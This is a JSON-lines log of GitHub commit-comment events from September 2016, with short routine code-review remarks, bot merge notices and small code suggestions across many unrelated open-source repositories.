{"id":"4535851463","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"TeamOrion-Devices/device_samsung_n1awifi"},"payload":{"comment":{"id":18950528,"position":332,"line":448,"path":"hal/camera/CameraWrapper.cpp","commit_id":"b3764a44648417a134ab8251c9c29bf9bdb74f60","created_at":"2016-09-08T18:36:23Z","updated_at":"2016-09-08T18:36:23Z","body":"You're missing the rest of this, ou need to add the goto done and the ending curly brace here"}},"created_at":"2016-09-08T18:36:23Z"}
{"id":"4535851934","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18950529,"position":null,"line":null,"path":null,"commit_id":"400f14980a983a9c6dca479faad415e10ff0a30e","created_at":"2016-09-08T18:36:29Z","updated_at":"2016-09-08T18:36:29Z","body":"lgtm"}},"created_at":"2016-09-08T18:36:29Z"}
{"id":"4535855936","type":"CommitCommentEvent","actor":{"login":"mshade"},"repo":{"name":"forumone/ruby-formula"},"payload":{"comment":{"id":18950542,"position":null,"line":null,"path":null,"commit_id":"c50349c7c0eac3daa29799d69e9f80241d4fa86d","created_at":"2016-09-08T18:37:14Z","updated_at":"2016-09-08T18:37:14Z","body":"fixes #1 "}},"created_at":"2016-09-08T18:37:14Z"}
{"id":"4535859204","type":"CommitCommentEvent","actor":{"login":"buren"},"repo":{"name":"thoughtbot/administrate"},"payload":{"comment":{"id":18950546,"position":null,"line":null,"path":null,"commit_id":"5227c9bc5b20904155f419409d6c3606763d24a5","created_at":"2016-09-08T18:37:49Z","updated_at":"2016-09-08T18:37:49Z","body":"@graysonwright oh yeah you're right! My bad, thank you 👍 "}},"created_at":"2016-09-08T18:37:49Z"}
{"id":"4535864038","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950551,"position":11,"line":11,"path":"Vagrantfile","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:38:40Z","updated_at":"2016-09-08T18:38:40Z","body":"maybe we should forward some ports, for the user's convenience? \r\ne.g. forwarding 8181 would allow users to view the FAST GUI in their local browser."}},"created_at":"2016-09-08T18:38:40Z"}
{"id":"4535866584","type":"CommitCommentEvent","actor":{"login":"TheKatarGit"},"repo":{"name":"ed-asriyan/University"},"payload":{"comment":{"id":18950554,"position":null,"line":null,"path":null,"commit_id":"bf0e9dde403b4854ae3810d6c78d4ed92f840363","created_at":"2016-09-08T18:39:07Z","updated_at":"2016-09-08T18:39:07Z","body":"Add Readme's with small task explanations to each lab, pls"}},"created_at":"2016-09-08T18:39:07Z"}
{"id":"4535866639","type":"CommitCommentEvent","actor":{"login":"MRebhan"},"repo":{"name":"BeetoGuy/BetterWithMods"},"payload":{"comment":{"id":18950555,"position":null,"line":null,"path":null,"commit_id":"21e253fd0afd7ee21bb172020cd8c2a203abf199","created_at":"2016-09-08T18:39:07Z","updated_at":"2016-09-08T18:39:07Z","body":"Oh so that's how it works :P\r\nI looked in the completely wrong place then"}},"created_at":"2016-09-08T18:39:07Z"}
{"id":"4535867864","type":"CommitCommentEvent","actor":{"login":"zknf2015"},"repo":{"name":"zknf2015/Tutorial"},"payload":{"comment":{"id":18950558,"position":3,"line":3,"path":".gitattributes","commit_id":"5e2fd356e04640dff4c97dc52edd708ece1ac4a0","created_at":"2016-09-08T18:39:19Z","updated_at":"2016-09-08T18:39:19Z","body":"77777"}},"created_at":"2016-09-08T18:39:19Z"}
{"id":"4535868940","type":"CommitCommentEvent","actor":{"login":"sunnystormy"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18950560,"position":null,"line":null,"path":null,"commit_id":"6896835034877608f6e6d6df7a653b4a90b121aa","created_at":"2016-09-08T18:39:29Z","updated_at":"2016-09-08T18:39:29Z","body":"Mind changing \"a easy to use\" to \"an easy to use\" for English speakers? :)"}},"created_at":"2016-09-08T18:39:29Z"}
{"id":"4535875023","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18950582,"position":null,"line":null,"path":null,"commit_id":"6e3e81370c7a38acdbe14b76b6c13251fa338af3","created_at":"2016-09-08T18:40:36Z","updated_at":"2016-09-08T18:40:36Z","body":"To PRE."}},"created_at":"2016-09-08T18:40:36Z"}
{"id":"4535877928","type":"CommitCommentEvent","actor":{"login":"biboudis"},"repo":{"name":"cwi-swat/recaf"},"payload":{"comment":{"id":18950589,"position":null,"line":null,"path":null,"commit_id":"2f3f270cebdc62d3348fbfc67238bb34f32d2931","created_at":"2016-09-08T18:41:06Z","updated_at":"2016-09-08T18:41:06Z","body":"Add one more test with latches to satisfy #9"}},"created_at":"2016-09-08T18:41:06Z"}
{"id":"4535880703","type":"CommitCommentEvent","actor":{"login":"stefansaraev"},"repo":{"name":"stefansaraev/TB"},"payload":{"comment":{"id":18950592,"position":null,"line":null,"path":null,"commit_id":"63d10b25895a1cf8aec4c867962a03d6f9b88992","created_at":"2016-09-08T18:41:34Z","updated_at":"2016-09-08T18:41:34Z","body":"@MilhouseVH @sraue you may want this too\r\n\r\nI've seen a case, where a user unplugs his sdcard, and just mounts it once under ubuntu and then ownership changed to 1000:, after that sshd with publickey auth fails miserably \r\n\r\nnot sure if it's ubuntu's udisks bug or a feature, or something else, I recall seeing such reports on OE forums in the past"}},"created_at":"2016-09-08T18:41:34Z"}
{"id":"4535881754","type":"CommitCommentEvent","actor":{"login":"JacobAMason"},"repo":{"name":"MSUStudents/BetterBanner"},"payload":{"comment":{"id":18950598,"position":null,"line":null,"path":null,"commit_id":"26483bf520025b48f01d9b6414627d2b70c10d4b","created_at":"2016-09-08T18:41:43Z","updated_at":"2016-09-08T18:41:43Z","body":"@hawkins Thanks. I ran into @EliCDavis and he confirmed it wasn't in the play story yet, but that he'd start using the releases tab and tag his commits like a good GitHubber."}},"created_at":"2016-09-08T18:41:43Z"}
{"id":"4535886142","type":"CommitCommentEvent","actor":{"login":"tedder"},"repo":{"name":"ge0rg/aprsdroid"},"payload":{"comment":{"id":18950607,"position":8,"line":30,"path":"src/BluetoothDevicePreference.java","commit_id":"cb8698007018c06168520b4bff8d9bd84643ddc5","created_at":"2016-09-08T18:42:29Z","updated_at":"2016-09-08T18:42:29Z","body":"It was the name that was missing in my case- doesn't that imply `dev` itself is null?"}},"created_at":"2016-09-08T18:42:29Z"}
{"id":"4535888038","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18950611,"position":8,"line":25,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"2a2b270d01dac81a6097af9b414e265e2685d52f","created_at":"2016-09-08T18:42:48Z","updated_at":"2016-09-08T18:42:48Z","body":"public = majuscule."}},"created_at":"2016-09-08T18:42:48Z"}
{"id":"4535892136","type":"CommitCommentEvent","actor":{"login":"mehdisadeghi"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18950615,"position":259,"line":126,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-08T18:43:31Z","updated_at":"2016-09-08T18:43:31Z","body":"@ahashibon Which items of the `super_cell` array do you want to access? There is a syntax error here."}},"created_at":"2016-09-08T18:43:31Z"}
{"id":"4535898112","type":"CommitCommentEvent","actor":{"login":"urkle"},"repo":{"name":"teambox/omniauth-redbooth"},"payload":{"comment":{"id":18950632,"position":null,"line":null,"path":null,"commit_id":"162e4b1e105678c0d1dd938f49ba75974a2b2352","created_at":"2016-09-08T18:44:31Z","updated_at":"2016-09-08T18:44:31Z","body":"FYI.. the fix for this is to simply add this into your strategy file\r\n```ruby\r\n      def callback_url\r\n        full_host + script_name + callback_path\r\n      end\r\n```\r\n"}},"created_at":"2016-09-08T18:44:31Z"}
{"id":"4535898208","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18950633,"position":null,"line":null,"path":null,"commit_id":"7088e29a297de67d8a501bc62e3faf25036710ad","created_at":"2016-09-08T18:44:32Z","updated_at":"2016-09-08T18:44:32Z","body":"Added loc as well."}},"created_at":"2016-09-08T18:44:32Z"}
{"id":"4535898844","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18950636,"position":null,"line":null,"path":null,"commit_id":"6e3e81370c7a38acdbe14b76b6c13251fa338af3","created_at":"2016-09-08T18:44:39Z","updated_at":"2016-09-08T18:44:39Z","body":"To PRO."}},"created_at":"2016-09-08T18:44:39Z"}
{"id":"4535899574","type":"CommitCommentEvent","actor":{"login":"vikrant4"},"repo":{"name":"codeoak/appFrontend"},"payload":{"comment":{"id":18950638,"position":20,"line":15,"path":"www/js/services/speakerservice.js","commit_id":"4ab1dc28c5d6afdc6a674183300e08d306dde3ef","created_at":"2016-09-08T18:44:47Z","updated_at":"2016-09-08T18:44:47Z","body":"It'll will work even without adding SERVER.url, any http request starting with '/' gets redirected to aws"}},"created_at":"2016-09-08T18:44:47Z"}
{"id":"4535908192","type":"CommitCommentEvent","actor":{"login":"BigBoot"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18950660,"position":null,"line":null,"path":null,"commit_id":"4d3d88891893532f291a4965482c1d511e12052d","created_at":"2016-09-08T18:46:17Z","updated_at":"2016-09-08T18:46:17Z","body":"Damn it you we're faster, now I'll have to rebase my search function. 👍 "}},"created_at":"2016-09-08T18:46:17Z"}
{"id":"4535908371","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":18950661,"position":null,"line":null,"path":null,"commit_id":"1209cbe097af02c5e02f7be0565c27c53c3d18d0","created_at":"2016-09-08T18:46:19Z","updated_at":"2016-09-08T18:46:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DPeUNSBo&#x2F;1-create-rails-application\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create Rails Application</a>"}},"created_at":"2016-09-08T18:46:19Z"}
{"id":"4535909799","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950667,"position":null,"line":null,"path":null,"commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:46:33Z","updated_at":"2016-09-08T18:46:33Z","body":"Should we install mininet, as in https://github.com/snlab/MapleVM ??"}},"created_at":"2016-09-08T18:46:33Z"}
{"id":"4535910043","type":"CommitCommentEvent","actor":{"login":"ffont"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":18950668,"position":5,"line":50,"path":"static/src/actions/midi.js","commit_id":"6ce1a816afee3fefe18f7dcad948b7d8314e5d00","created_at":"2016-09-08T18:46:35Z","updated_at":"2016-09-08T18:46:35Z","body":"The refactor of the midi reducer had wrong conditions, I changed them to make it work as expected. Probably this is the change."}},"created_at":"2016-09-08T18:46:35Z"}
{"id":"4535912559","type":"CommitCommentEvent","actor":{"login":"Paul-E"},"repo":{"name":"ietf/perc-wg"},"payload":{"comment":{"id":18950675,"position":232,"line":327,"path":"draft-jones-perc-dtls-tunnel/draft-jones-perc-dtls-tunnel.md","commit_id":"6cabcd52999a9743afc5a5b2264eeaba239589a4","created_at":"2016-09-08T18:47:02Z","updated_at":"2016-09-08T18:47:02Z","body":">  The corner case is when the MD thinks it's gone, but the KD doesn't. Perhaps a simple solution is this: always require the MD to send an \"endpoint disconnect\" message.\r\n\r\nThis is what I was thinking. In general the MD it is only recommended that the MD send the disconnect message, but if it wants to reuse and id, then it MUST."}},"created_at":"2016-09-08T18:47:02Z"}
{"id":"4535918189","type":"CommitCommentEvent","actor":{"login":"mrdoob"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18950686,"position":null,"line":null,"path":null,"commit_id":"6896835034877608f6e6d6df7a653b4a90b121aa","created_at":"2016-09-08T18:48:02Z","updated_at":"2016-09-08T18:48:02Z","body":"Will do! 😅"}},"created_at":"2016-09-08T18:48:02Z"}
{"id":"4535922590","type":"CommitCommentEvent","actor":{"login":"bengland2"},"repo":{"name":"ndokos/pbench"},"payload":{"comment":{"id":18950699,"position":null,"line":null,"path":null,"commit_id":"1c52ee2155af6fd9f1a6d7a0ed7b82dab643a42a","created_at":"2016-09-08T18:48:48Z","updated_at":"2016-09-08T18:48:48Z","body":"love it!  I was screen scraping with `ls -trd /var/lib/pbench-agent | tail -1` but would rather not."}},"created_at":"2016-09-08T18:48:48Z"}
{"id":"4535925501","type":"CommitCommentEvent","actor":{"login":"chrisdpeters"},"repo":{"name":"cfwheels/cfwheels"},"payload":{"comment":{"id":18950703,"position":null,"line":null,"path":null,"commit_id":"1e4209a3005395adb423dddb723800b7a74a52fa","created_at":"2016-09-08T18:49:19Z","updated_at":"2016-09-08T18:49:19Z","body":":+1: Thanks for catching this. Hopefully we can figure out the other issue."}},"created_at":"2016-09-08T18:49:19Z"}
{"id":"4535926712","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18950707,"position":390,"line":599,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T18:49:34Z","updated_at":"2016-09-08T18:49:34Z","body":"button1 тоже как-нибудь назвать. Например: pedestrian_button\r\n"}},"created_at":"2016-09-08T18:49:34Z"}
{"id":"4535928264","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18950710,"position":null,"line":null,"path":null,"commit_id":"4231a08e57f86cedfe806f11cc87683e46c456bb","created_at":"2016-09-08T18:49:51Z","updated_at":"2016-09-08T18:49:51Z","body":"Wow: exactly the same, I'll delete my test!"}},"created_at":"2016-09-08T18:49:51Z"}
{"id":"4535928907","type":"CommitCommentEvent","actor":{"login":"giuband"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":18950712,"position":5,"line":50,"path":"static/src/actions/midi.js","commit_id":"6ce1a816afee3fefe18f7dcad948b7d8314e5d00","created_at":"2016-09-08T18:49:58Z","updated_at":"2016-09-08T18:49:58Z","body":"We need to change the names of these two methods then, because if you read the code at lines 63-64 it doesn't make much sense"}},"created_at":"2016-09-08T18:49:58Z"}
{"id":"4535929494","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18950715,"position":null,"line":null,"path":null,"commit_id":"569306422e14ee51a72ae7481006a6a45f378b1a","created_at":"2016-09-08T18:50:04Z","updated_at":"2016-09-08T18:50:04Z","body":"saw approval from nickelization\nat https://github.com/basho/riak_kv/commit/569306422e14ee51a72ae7481006a6a45f378b1a"}},"created_at":"2016-09-08T18:50:04Z"}
{"id":"4535929559","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18950716,"position":null,"line":null,"path":null,"commit_id":"569306422e14ee51a72ae7481006a6a45f378b1a","created_at":"2016-09-08T18:50:05Z","updated_at":"2016-09-08T18:50:05Z","body":"merging basho/riak_kv/zl-correct-cap-for-second-crdt = 56930642 into borshop-integration-1476-zl-correct-cap-for-second-crdt"}},"created_at":"2016-09-08T18:50:05Z"}
{"id":"4535929609","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18950717,"position":null,"line":null,"path":null,"commit_id":"569306422e14ee51a72ae7481006a6a45f378b1a","created_at":"2016-09-08T18:50:05Z","updated_at":"2016-09-08T18:50:05Z","body":"basho/riak_kv/zl-correct-cap-for-second-crdt = 56930642 merged ok, testing candidate = 7311ed8a"}},"created_at":"2016-09-08T18:50:05Z"}
{"id":"4535931151","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18950722,"position":null,"line":null,"path":null,"commit_id":"1e797ac7fb72ed4eebf468bb2871e05a82cc9c76","created_at":"2016-09-08T18:50:21Z","updated_at":"2016-09-08T18:50:21Z","body":"Is this currently supportable on a Pi build? I've not managed to find packages that support it. (qtmultimedia)"}},"created_at":"2016-09-08T18:50:21Z"}
{"id":"4535939771","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":18950746,"position":null,"line":null,"path":null,"commit_id":"286c9d6b059df1018e4b3aa39e74f17a41c4c94d","created_at":"2016-09-08T18:51:57Z","updated_at":"2016-09-08T18:51:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JVhdc2zPQV-NEClQ5cl83g"}},"created_at":"2016-09-08T18:51:57Z"}
{"id":"4535949614","type":"CommitCommentEvent","actor":{"login":"guillaumerose"},"repo":{"name":"MorbZ/OSMonaut"},"payload":{"comment":{"id":18950763,"position":6,"line":76,"path":"src/main/java/net/morbz/osmonaut/Osmonaut.java","commit_id":"92360193001dd26b1defb916d74ad1b5661967f9","created_at":"2016-09-08T18:53:46Z","updated_at":"2016-09-08T18:53:46Z","body":"On large machine, we don't want to create too many threads. "}},"created_at":"2016-09-08T18:53:46Z"}
{"id":"4535949979","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18950764,"position":null,"line":null,"path":null,"commit_id":"2410a0be48379b0bc2302d646052048ea111d34f","created_at":"2016-09-08T18:53:50Z","updated_at":"2016-09-08T18:53:50Z","body":"The following doc(s) have been deployed to the [revert1873](https://revert1873-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/clone-site](https://revert1873-static-docs.pantheonsite.io/docs/clone-site)\n"}},"created_at":"2016-09-08T18:53:50Z"}
{"id":"4535951388","type":"CommitCommentEvent","actor":{"login":"trevorcai"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18950765,"position":24,"line":24,"path":"ui/search.jsx","commit_id":"4d329ed7f8ef919e88b690e0ed222129717b7308","created_at":"2016-09-08T18:54:07Z","updated_at":"2016-09-08T18:54:07Z","body":"It seems like both options are functionally the same; is `bind` preferred for some reason?"}},"created_at":"2016-09-08T18:54:07Z"}
{"id":"4535951645","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18950768,"position":1,"line":0,"path":"app/.gitignore","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-08T18:54:11Z","updated_at":"2016-09-08T18:54:11Z","body":"Стоит добавить ещё хотя бы .idea/"}},"created_at":"2016-09-08T18:54:11Z"}
{"id":"4535952613","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18950769,"position":386,"line":1351,"path":"src/ng/directive/ngModel.js","commit_id":"87a2ff76af5d0a9268d8eb84db5755077d27c84c","created_at":"2016-09-08T18:54:16Z","updated_at":"2016-09-08T18:54:16Z","body":"No `controller.$onInit()` :disappointed: "}},"created_at":"2016-09-08T18:54:16Z"}
{"id":"4535952809","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18950772,"position":null,"line":null,"path":null,"commit_id":"4d3d88891893532f291a4965482c1d511e12052d","created_at":"2016-09-08T18:54:23Z","updated_at":"2016-09-08T18:54:23Z","body":"I'm sorry, I just wanted to add the context menu for you :P"}},"created_at":"2016-09-08T18:54:23Z"}
{"id":"4535953320","type":"CommitCommentEvent","actor":{"login":"scscgit"},"repo":{"name":"BEST-Kosice/wp_best_courses_lbgs"},"payload":{"comment":{"id":18950773,"position":239,"line":238,"path":"includes/class-database.php","commit_id":"ab7b8bc78081ef0435f919f2d8c2c2130f92122b","created_at":"2016-09-08T18:54:29Z","updated_at":"2016-09-08T18:54:29Z","body":"Bug fixed at https://github.com/BEST-Kosice/wp_best_courses_lbgs/commit/99316522823f8ae306dbcdf2b49fdc8f7705c89a"}},"created_at":"2016-09-08T18:54:29Z"}
{"id":"4535956337","type":"CommitCommentEvent","actor":{"login":"catarak"},"repo":{"name":"processing/p5.js-web-editor"},"payload":{"comment":{"id":18950778,"position":null,"line":null,"path":null,"commit_id":"00c979a763ee216e144cf8253e19a676793fa612","created_at":"2016-09-08T18:55:01Z","updated_at":"2016-09-08T18:55:01Z","body":"You're on the right track! \r\n\r\n- I would actually bind the events to the `document` rather than to the CodeMirror editor, so that a user doesn't have to be typing in the editor in order for the event to fire, i.e. `document.on('keydown'...`.\r\n- If you look at the component `Toolbar.js`, and you scroll to the bottom, you'll see on line 114 `Toolbar.propTypes = ...`. This is a list of all of the data that the Toolbar component knows about. If you look in `IDEView.js` (apologies for this massive file, I'm figuring out how to break this up), you'll see on line 144 the Toolbar component is instantiated, and passed all of the properties in `Toolbar.propTypes`. The reason `Editor.js` doesn't see the function `this.startSketch()` is because it hasn't been passed to it. If passed to the Editor component, it would be able to access that function as `this.props.startSketch()`. \r\n- I started adding some other keyboard shortcuts, e.g. Command + S for saving, which is handled in the function `handleGlobalKeydown` in `IDEView`. This, I think, is the best place to add this event handler. IDEView has access in its properties to startSketch and stopSketch.  \r\n- Don't forget to handle the different keyboard shortcuts for Windows!"}},"created_at":"2016-09-08T18:55:01Z"}
{"id":"4535956497","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18950779,"position":12,"line":12,"path":"ChickenAdventure/Assets/Scripts/BatonMage.cs","commit_id":"2a2b270d01dac81a6097af9b414e265e2685d52f","created_at":"2016-09-08T18:55:04Z","updated_at":"2016-09-08T18:55:04Z","body":"En programmation, quand vous avez tout un tas de variable avec un même prefix, créez une sous-structure. Quand vous avez des variables numérotées, créez un tableau.\r\n\r\nPour la beauté du C#.\r\n\r\n\tpublic class Cout {\r\n\t\tpublic int Feu;\r\n\t\tpublic int Glace;\r\n\r\n\t\tpublic Cout() {\r\n\t\t\tFeu = 0;\r\n\t\t\tGlace = 0;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class Arme {\r\n\t\tpublic int Dmg;\r\n\t\tpublic Cout Cout;\r\n\r\n\t\tpublic Arme() {\r\n\t\t\tDmg = 0;\r\n\t\t\tCout = new Cout();\r\n\t\t}\r\n\t}\r\n\r\n\tvar baton = new Arme () {\r\n\t\tDmg = 10,\r\n\t\tCout = {\r\n\t\t\tFeu = 20,\r\n\t\t\tGlace = 30\r\n\t\t}\r\n\t};\r\n"}},"created_at":"2016-09-08T18:55:04Z"}
{"id":"4535956984","type":"CommitCommentEvent","actor":{"login":"jaimecasero"},"repo":{"name":"RestComm/sip-servlets"},"payload":{"comment":{"id":18950781,"position":29,"line":192,"path":"containers/sip-servlets-as7/src/main/java/org/mobicents/servlet/sip/core/timers/FaultTolerantSasTimerService.java","commit_id":"1fef86e60a836e65571b49c212aa7fda31333121","created_at":"2016-09-08T18:55:11Z","updated_at":"2016-09-08T18:55:11Z","body":"creating a new thread for cancelling existing timer seems a bit overhead. Could we reuse some executorservice, hopefully the one behind getScheduler()..."}},"created_at":"2016-09-08T18:55:11Z"}
{"id":"4535959162","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18950783,"position":5,"line":107,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"73e7712390b7b0e79dd02fbc69c6e24973d599aa","created_at":"2016-09-08T18:55:29Z","updated_at":"2016-09-08T18:55:29Z","body":"Does this value come directly from the database ? I thought we have changed the structure in the database (https://jira.exoplatform.org/browse/CHAT-400?focusedCommentId=406449&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-406449)."}},"created_at":"2016-09-08T18:55:29Z"}
{"id":"4535959180","type":"CommitCommentEvent","actor":{"login":"bobwolff68"},"repo":{"name":"FRCTeam1967/FRCTeam1967"},"payload":{"comment":{"id":18950784,"position":26,"line":59,"path":"code/Ball Manipulation/src/BallManipulation.cpp","commit_id":"fe4c082c06e93420693b93cfc82b79d91e830e8f","created_at":"2016-09-08T18:55:29Z","updated_at":"2016-09-08T18:55:29Z","body":"Nice change."}},"created_at":"2016-09-08T18:55:29Z"}
{"id":"4535960814","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18950789,"position":null,"line":null,"path":null,"commit_id":"55e2c673f227dc090340cd713e7a71afaa4c0cb7","created_at":"2016-09-08T18:55:47Z","updated_at":"2016-09-08T18:55:47Z","body":"The following doc(s) have been deployed to the [1874redis](https://1874redis-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/redis](https://1874redis-static-docs.pantheonsite.io/docs/redis)\n- [docs/wordpress-redis](https://1874redis-static-docs.pantheonsite.io/docs/wordpress-redis)\n"}},"created_at":"2016-09-08T18:55:47Z"}
{"id":"4535965792","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18950798,"position":279,"line":487,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T18:56:42Z","updated_at":"2016-09-08T18:56:42Z","body":"yellow_22 - плохое название. Кто откроет функцию будет гадать что за двадцать второй желтый. Лучше длиней, но понятней.\r\ntime_green_to_yellow_2_road - мб так\r\n------------------------\r\nИ да, ифы, плииииз :)"}},"created_at":"2016-09-08T18:56:42Z"}
{"id":"4535971734","type":"CommitCommentEvent","actor":{"login":"TheKatarGit"},"repo":{"name":"ed-asriyan/University"},"payload":{"comment":{"id":18950807,"position":10,"line":10,"path":"Programming/Seminars/2/ConvexHull.c","commit_id":"981f5ee633e606a5e7350554cf0700cccdec6e47","created_at":"2016-09-08T18:57:47Z","updated_at":"2016-09-08T18:57:47Z","body":"Man, commented lines in Git are bad:) Maybe i'm obvious, but could not pass by it"}},"created_at":"2016-09-08T18:57:47Z"}
{"id":"4535978741","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18950825,"position":3,"line":0,"path":"app/proguard-rules.pro","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-08T18:59:07Z","updated_at":"2016-09-08T18:59:07Z","body":"Тоже в .gitignore"}},"created_at":"2016-09-08T18:59:07Z"}
{"id":"4535991866","type":"CommitCommentEvent","actor":{"login":"kzidane"},"repo":{"name":"cs50/help50"},"payload":{"comment":{"id":18950855,"position":13,"line":17,"path":"helpers/make.py","commit_id":"ce93e59f6f410e8ba6bafb42c77828ad6192ede7","created_at":"2016-09-08T19:01:22Z","updated_at":"2016-09-08T19:01:22Z","body":"Good idea to add `\"in the current directory\"`? I mean technically\r\n\r\n```\r\n~/workspace\r\n└── pset1\r\n    └── hello.c\r\n```\r\n\r\n![help50-make-hello](https://cloud.githubusercontent.com/assets/7230211/18362724/3b965884-7607-11e6-9ed6-52be761292f0.png)\r\n\r\nhttp://newapps.cs50.net/cs50/@/discuss/thread/31501\r\n\r\nI mean, technically, he did have a file called `hello.c` :smile: "}},"created_at":"2016-09-08T19:01:22Z"}
{"id":"4535993567","type":"CommitCommentEvent","actor":{"login":"EliCDavis"},"repo":{"name":"MSUStudents/BetterBanner"},"payload":{"comment":{"id":18950859,"position":null,"line":null,"path":null,"commit_id":"26483bf520025b48f01d9b6414627d2b70c10d4b","created_at":"2016-09-08T19:01:40Z","updated_at":"2016-09-08T19:01:40Z","body":"Releases will start with next time we update the extension"}},"created_at":"2016-09-08T19:01:40Z"}
{"id":"4535996869","type":"CommitCommentEvent","actor":{"login":"draeger"},"repo":{"name":"sbmlteam/jsbml"},"payload":{"comment":{"id":18950870,"position":33,"line":568,"path":"core/src/org/sbml/jsbml/CVTerm.java","commit_id":"2c7f98916f839cae76849365ba6399e780ac56c1","created_at":"2016-09-08T19:02:18Z","updated_at":"2016-09-08T19:02:18Z","body":"The declarations could be omitted as they are \"runtime exceptions\". However, these are identical to the declarations of the `add(int, String)` method from `List`. The declarations are there to inform users about potential problems. Feel free to remove them."}},"created_at":"2016-09-08T19:02:18Z"}
{"id":"4535999025","type":"CommitCommentEvent","actor":{"login":"pliniopereira"},"repo":{"name":"hiyoku/ccd10"},"payload":{"comment":{"id":18950874,"position":null,"line":null,"path":null,"commit_id":"d9a924943ab64b276f8f4831a303b9cc6fb35852","created_at":"2016-09-08T19:02:40Z","updated_at":"2016-09-08T19:02:40Z","body":"Foi acrescentada a variável `site_id_name` para nomeação de diretório."}},"created_at":"2016-09-08T19:02:40Z"}
{"id":"4536001514","type":"CommitCommentEvent","actor":{"login":"PaulNel"},"repo":{"name":"PaulNel/BloomDesktop"},"payload":{"comment":{"id":18950884,"position":null,"line":null,"path":null,"commit_id":"2b73f043fbf0b7106455ada99acefae0f7ceb7f0","created_at":"2016-09-08T19:03:09Z","updated_at":"2016-09-08T19:03:09Z","body":"Error with <note> entries. Fixing in subsequent update."}},"created_at":"2016-09-08T19:03:09Z"}
